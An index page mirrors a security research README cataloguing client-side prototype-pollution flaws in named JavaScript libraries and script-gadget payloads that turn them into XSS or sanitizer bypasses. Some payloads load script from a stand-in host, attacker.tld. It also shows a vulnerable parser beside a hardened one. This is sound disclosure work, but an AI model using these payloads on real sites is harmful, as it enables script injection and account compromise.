Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/BlackFan/client-side-prototype-pollution

Prototype Pollution and useful Script Gadgets

# Client-Side Prototype Pollution

## Intro

If you are unfamiliar with prototype pollution attacks, read the following first:

- [JavaScript prototype pollution attack in NodeJS](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) by Olivier Arteau
- [Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) by Michał Bentkowski

In this repository I collect examples of libraries that are vulnerable to prototype pollution because they parse `document.location` (the query string or the fragment) into nested objects without guarding the `__proto__`, `constructor` and `prototype` keys, together with script gadgets: code in other widely deployed libraries that reads properties off the polluted `Object.prototype` and can be used to demonstrate the impact, typically XSS or a sanitizer bypass.
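To make the two halves of the table concrete, here is an added example (not code from this repository or from any library it lists): a minimal query-string parser in the style of jQuery BBQ / jquery-deparam that is vulnerable to prototype pollution, the hardened version of the same parser, and a toy gadget that turns the pollution into markup injection. It runs under Node; in a browser you would pass `location.search` or `location.hash` instead of the constructed strings used below. All function names (`splitPairs`, `deparamVulnerable`, `deparamSafe`, `buildEmbedTag`, `runPolluted`) are this example's own.

```javascript
// Added example, not code from the repository or the libraries it lists.
// "a[b][c]=v" and "a.b.c=v" both become (["a", "b", "c"], "v").
function splitPairs(query) {
  const pairs = [];
  for (const pair of query.replace(/^[?#]/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawValue = eq === -1 ? '' : pair.slice(eq + 1);
    const keys = decodeURIComponent(rawKey).replace(/\]/g, '').split(/\[|\./);
    pairs.push([keys, decodeURIComponent(rawValue.replace(/\+/g, ' '))]);
  }
  return pairs;
}

// Vulnerable: walks the key path with plain property access, so the first
// segment "__proto__" resolves to Object.prototype (and "constructor" to the
// Object function, whose "prototype" is the same object). The final
// assignment then lands on Object.prototype and is inherited by every object.
function deparamVulnerable(query) {
  const result = {};
  for (const [keys, value] of splitPairs(query)) {
    let cur = result;
    for (let i = 0; i < keys.length - 1; i++) {
      if (cur[keys[i]] == null) cur[keys[i]] = {};
      cur = cur[keys[i]];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return result;
}

// Hardened: reject the three dangerous segments outright, build only
// prototype-less objects, and never follow an inherited property while walking.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function deparamSafe(query) {
  const result = Object.create(null);
  for (const [keys, value] of splitPairs(query)) {
    if (keys.some((k) => FORBIDDEN_KEYS.has(k))) continue; // drop the whole pair
    let cur = result;
    for (let i = 0; i < keys.length - 1; i++) {
      const k = keys[i];
      if (!Object.prototype.hasOwnProperty.call(cur, k) || typeof cur[k] !== 'object') {
        cur[k] = Object.create(null);
      }
      cur = cur[k];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return result;
}

// Toy gadget (constructed for this example): a widget builder that reads
// optional settings from a config object. config.tagName on an empty object is
// undefined until Object.prototype.tagName exists, and the same goes for the
// attributes. This is the shape of the Marionette/Backbone gadget in the table.
function buildEmbedTag(config) {
  const tag = config.tagName || 'div';
  const attrs = [];
  for (const name of ['src', 'onerror', 'onload']) {
    if (config[name] !== undefined) attrs.push(`${name}="${config[name]}"`);
  }
  return `<${tag}${attrs.length ? ' ' + attrs.join(' ') : ''}></${tag}>`;
}

// Run `parser` on `query`, evaluate `probe` while the pollution is in effect,
// then delete whatever the parser added to Object.prototype so that nothing
// else in the process is affected by the experiment.
function runPolluted(query, parser, probe) {
  const before = new Set(Object.getOwnPropertyNames(Object.prototype));
  try {
    parser(query);
    return probe();
  } finally {
    for (const name of Object.getOwnPropertyNames(Object.prototype)) {
      if (!before.has(name)) delete Object.prototype[name];
    }
  }
}

// Payloads taken from the tables in this README.
console.log(runPolluted('?__proto__[test]=test', deparamVulnerable, () => ({}).test));              // "test"
console.log(runPolluted('?constructor[prototype][test]=test', deparamVulnerable, () => ({}).test)); // "test"
console.log(runPolluted('?__proto__[test]=test', deparamSafe, () => ({}).test));                    // undefined
console.log(runPolluted('?__proto__[tagName]=img&__proto__[src]=x:&__proto__[onerror]=alert(1)',
  deparamVulnerable, () => buildEmbedTag({})));                                                     // <img src="x:" onerror="alert(1)"></img>
```

Two points of the hardened version matter in practice: dropping the pair is safer than stripping the offending segment (stripping `__proto__` from `__proto__[test]` would silently store `test` at the top level), and `Object.create(null)` plus an own-property check closes the `constructor[prototype]` route, which a blocklist of `__proto__` alone does not.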

## Prototype Pollution

| Name | Payload | Refs | Found by |
|------|---------|------|----------|
| Wistia Embedded Video (**Fixed**) | `?__proto__[test]=test`<br>`?__proto__.test=test` | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |
| [jQuery query-object plugin](/pp/jquery-query-object.md)<br>CVE-2021-20083 | `?__proto__[test]=test`<br>`#__proto__[test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery Sparkle](/pp/jquery-sparkle.md)<br>CVE-2021-20084 | `?__proto__.test=test`<br>`?constructor.prototype.test=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [V4Fire Core Library](/pp/v4fire-core.md) | `?__proto__.test=test`<br>`?__proto__[test]=test`<br>`?__proto__[test]={"json":"value"}` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [backbone-query-parameters](/pp/backbone-qp.md)<br>CVE-2021-20085 | `?__proto__.test=test`<br>`?constructor.prototype.test=test`<br>`?__proto__.array=1\|2\|3` | [[1]](https://bugcrowd.com/disclosures/57b28008-4653-4dec-88c3-4d38e40023ff/toolbox-teslamotors-com-html-injection-via-prototype-pollution-potential-xss) | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery BBQ](/pp/jquery-bbq.md)<br>CVE-2021-20086 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jquery-deparam](/pp/jquery-deparam.md)<br>CVE-2021-20087 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [MooTools More](/pp/mootools-more.md)<br>CVE-2021-20088 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Swiftype Site Search](/pp/swiftype-site-search.md) (**Fixed**) | `#__proto__[test]=test` | [[1]](https://hackerone.com/reports/998398) | [s1r1us](https://twitter.com/S1r1u5_) |
| [CanJS deparam](/pp/canjs-deparam.md) | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | [Rahul Maini](https://twitter.com/iamnoooob) |
| [Purl (jQuery-URL-Parser)](/pp/purl.md)<br>CVE-2021-20089 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [HubSpot Tracking Code](/pp/hubspot.md) (**Fixed**) | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [YUI 3 querystring-parse](/pp/yui3.md) | `?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Mutiny](/pp/mutiny.md) (**Fixed**) | `?__proto__.test=test` | | [SPQR](https://twitter.com/amlnspqr) |
| [jQuery parseParams](/pp/jquery-parseparam.md) | `?__proto__.test=test`<br>`?constructor.prototype.test=test` | | [POSIX](https://twitter.com/po6ix) |
| [php.js parse_str](/pp/parse_str.md) | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | [POSIX](https://twitter.com/po6ix) |
| [arg.js](/pp/arg-js.md) | `?__proto__[test]=test`<br>`?__proto__.test=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | [POSIX](https://twitter.com/po6ix) |
| [davis.js](/pp/davis-js.md) | `?__proto__[test]=test` | | [POSIX](https://twitter.com/po6ix) |
| [Component querystring](/pp/component_querystring.md) | `?__proto__[NUMBER]=test`<br>`?__proto__[123]=test` | | [Masato Kinugawa](https://twitter.com/kinugawamasato) |
| [Aurelia path](/pp/aurelia.md) | `?__proto__[test]=test` | [[1]](https://github.com/aurelia/path/issues/44) | [s1r1us](https://twitter.com/S1r1u5_) |
| [analytics-utils < 1.0.3](/pp/analytics-utils.md) | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | [[1]](https://github.com/DavidWells/analytics/issues/204) | [alexdaviestray](https://github.com/alexdaviestray) |

## Script Gadgets

| Name | Payload | Impact | Refs | Found by |
|------|---------|--------|------|----------|
| [Wistia Embedded Video](/gadgets/wistia-video.md) | `?__proto__[innerHTML]=` | XSS | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |
| [jQuery $.get](/gadgets/jquery.md#get-jquery-all-versions) | `?__proto__[context]=`<br>`&__proto__[jquery]=x` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $.get >= 3.0.0](/gadgets/jquery.md#get-jquery--300)<br>Boolean.prototype | `?__proto__[url][]=data:,alert(1)//`<br>`&__proto__[dataType]=script` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [jQuery $.get >= 3.0.0](/gadgets/jquery.md#get-jquery--300-1)<br>Boolean.prototype | `?__proto__[url]=data:,alert(1)//`<br>`&__proto__[dataType]=script`<br>`&__proto__[crossDomain]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $.getScript >= 3.4.0](/gadgets/jquery.md#getscript-jquery--340) | `?__proto__[src][]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [jQuery $.getScript 3.0.0 - 3.3.1](/gadgets/jquery.md#getscript-jquery-300---331)<br>Boolean.prototype | `?__proto__[url]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [jQuery $(html)](/gadgets/jquery.md#html-jquery-all-versions) | `?__proto__[div][0]=1`<br>`&__proto__[div][1]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $(x).off](/gadgets/jquery.md#xoff-jquery-all-versions)<br>String.prototype | `?__proto__[preventDefault]=x`<br>`&__proto__[handleObj]=x`<br>`&__proto__[delegateTarget]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $(x).attr](/gadgets/jquery.md#xattr-jquery--180) | `?__proto__[OnError]=alert(1)`<br>`&__proto__[SRC]=fakeimagewontload.jpg` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) [[2]](https://mizu.re/post/intigriti-january-2024-xss-challenge) | [Johan Carlsson](https://twitter.com/joaxcar) |
| [jQuery $(x).on, $(x).submit](/gadgets/jquery.md#xon-xsubmit-jquery--190) | `?__proto__[handler][]=x`<br>`&__proto__[selector][]=`<br>`&__proto__[focus]=x`<br>`&__proto__[needsContext]=x` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) | [Johan Carlsson](https://twitter.com/joaxcar) |
| [Google reCAPTCHA](/gadgets/recaptcha.md) | `?__proto__[srcdoc][]=alert(1)` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Twitter Universal Website Tag](/gadgets/twitter-uwt.md) (**Fixed**) | `?__proto__[hif][]=javascript:alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Tealium Universal Tag](/gadgets/tealium-utag.md) | `?__proto__[attrs][src]=1`<br>`&__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Akamai Boomerang](/gadgets/akamai-boomerang.md) | `?__proto__[BOOMR]=1`<br>`&__proto__[url]=//attacker.tld/js.js` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Lodash <= 4.17.15](/gadgets/lodash.md) | `?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)` | XSS | [[1]](https://github.com/lodash/lodash/pull/4518) | [Alex Brasetvik](https://twitter.com/alexbrasetvik) |
| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[*][]=onload` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[innerText]=alert(1)` | Bypass | [[1]](https://github.com/apostrophecms/sanitize-html/commit/0fe551c2c6fac1277c0b9688263bd61acc52baf8) | [Hpdoger](https://twitter.com/hpdoger) |
| [js-xss](/gadgets/js-xss.md) | `?__proto__[whiteList][img][0]=onerror`<br>`&__proto__[whiteList][img][1]=src` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [DOMPurify <= 2.0.12](/gadgets/dompurify.md) | `?__proto__[ALLOWED_ATTR][0]=onerror`<br>`&__proto__[ALLOWED_ATTR][1]=src` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [DOMPurify <= 2.0.12](/gadgets/dompurify.md) | `?__proto__[documentMode]=9` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[*%20ONERROR]=1`<br>`&__proto__[*%20SRC]=1` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//` | XSS | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Marionette.js / Backbone.js](/gadgets/marionette.md) | `?__proto__[tagName]=img`<br>`&__proto__[src][]=x:`<br>`&__proto__[onerror][]=alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[SRC]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Swiftype Site Search](/gadgets/swiftype-site-search.md) | `?__proto__[xxx]=alert(1)` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Embedly Cards](/gadgets/embedly.md) | `?__proto__[onload]=alert(1)` | XSS | | [Guilherme Keerok](https://twitter.com/k33r0k) |
| [Segment Analytics.js](/gadgets/segment-analytics.md) | `?__proto__[script][0]=1`<br>`&__proto__[script][1]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Knockout.js](/gadgets/knockout.md)<br>Array.prototype | `?__proto__[4]=a':1,[alert(1)]:1,'b`<br>`&__proto__[5]=,` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Zepto.js](/gadgets/zepto.md) | `?__proto__[onerror]=alert(1)` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |
| [Zepto.js](/gadgets/zepto.md) | `?__proto__[html]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Sprint.js](/gadgets/sprint.md) | `?__proto__[div][intro]=` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-if]=_c.constructor('alert(1)')()` | XSS | | [POSIX](https://twitter.com/po6ix) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[attrs][0][name]=src`<br>`&__proto__[attrs][0][value]=xxx`<br>`&__proto__[xxx]=data:,alert(1)//`<br>`&__proto__[is]=script` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [s1r1us](https://twitter.com/S1r1u5_) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [r00timentary](https://ctftime.org/team/32783) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[data]=a`<br>`&__proto__[template][nodeType]=a`<br>`&__proto__[template][innerHTML]=alert(1)` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [SuperGuesser](https://twitter.com/SuperGuesser) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[props][][value]=a`<br>`&__proto__[name]=":''.constructor.constructor('alert(1)')(),"` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [st98_](https://twitter.com/st98_) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[template]=alert(1)` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/24) | [huli](https://github.com/aszx87410/) |
| [Demandbase Tag](/gadgets/demandbase-tag.md) | `?__proto__[Config][SiteOptimization][enabled]=1`<br>`&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?` | XSS | | [SPQR](https://twitter.com/amlnspqr) |
| [@analytics/google-tag-manager](/gadgets/analytics-google-tag-manager.md) | `?__proto__[customScriptSrc]=//attacker.tld/xss.js` | XSS | | [SPQR](https://twitter.com/amlnspqr) |
| [i18next](/gadgets/i18next.md) | `?__proto__[lng]=cimode`<br>`&__proto__[appendNamespaceToCIMode]=x`<br>`&__proto__[nsSeparator]=` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [i18next < 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`<br>`&__proto__[a]=b`<br>`&__proto__[obj]=c`<br>`&__proto__[k]=d`<br>`&__proto__[d]=` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [i18next >= 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`<br>`&__proto__[key]=` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[cookieName]=COOKIE%3DInjection%3B` | Cookie Injection | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Popper.js](/gadgets/popper.md) | `?__proto__[arrow][style]=color:red;transition:all%201s`<br>`&__proto__[arrow][ontransitionend]=alert(1)`<br><br>`?__proto__[reference][style]=color:red;transition:all%201s`<br>`&__proto__[reference][ontransitionend]=alert(2)`<br><br>`?__proto__[popper][style]=color:red;transition:all%201s`<br>`&__proto__[popper][ontransitionend]=alert(3)` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/36) [[2]](https://lemonslab.me/posts/small-talk-writeup/) | [Matheus Vrech](https://twitter.com/vrechson) |
| [Pendo Agent](/gadgets/pendo-agent.md) | `?__proto__[dataHost]=attacker.tld/js.js%23` | XSS | | [Renwa](https://twitter.com/RenwaX23) |
| [script.aculo.us](/gadgets/scriptaculous.md)<br>String.constructor | `?x=x`<br>`&x[constructor][__parseStyleElement][innerHTML]=` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [hCaptcha](/gadgets/hcaptcha.md) (**Fixed**) | `?__proto__[assethost]=javascript:alert(1)//` | XSS | | [Masato Kinugawa](https://twitter.com/kinugawamasato) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[trustedTypes]=x`<br>`&__proto__[emptyHTML]=` | XSS | | [Mathias Karlsson](https://twitter.com/avlidienbrunn) |
| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[vtp_enableRecaptcha]=1`<br>`&__proto__[srcdoc]=alert(1)` | XSS | | [terjanq](https://twitter.com/terjanq) |
| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[q][0][0]=require`<br>`&__proto__[q][0][1]=x`<br>`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) / [Masato Kinugawa](https://twitter.com/kinugawamasato) |
| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[q][0][0]=require`<br>`&__proto__[q][0][1]=x`<br>`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) / [Masato Kinugawa](https://twitter.com/kinugawamasato) |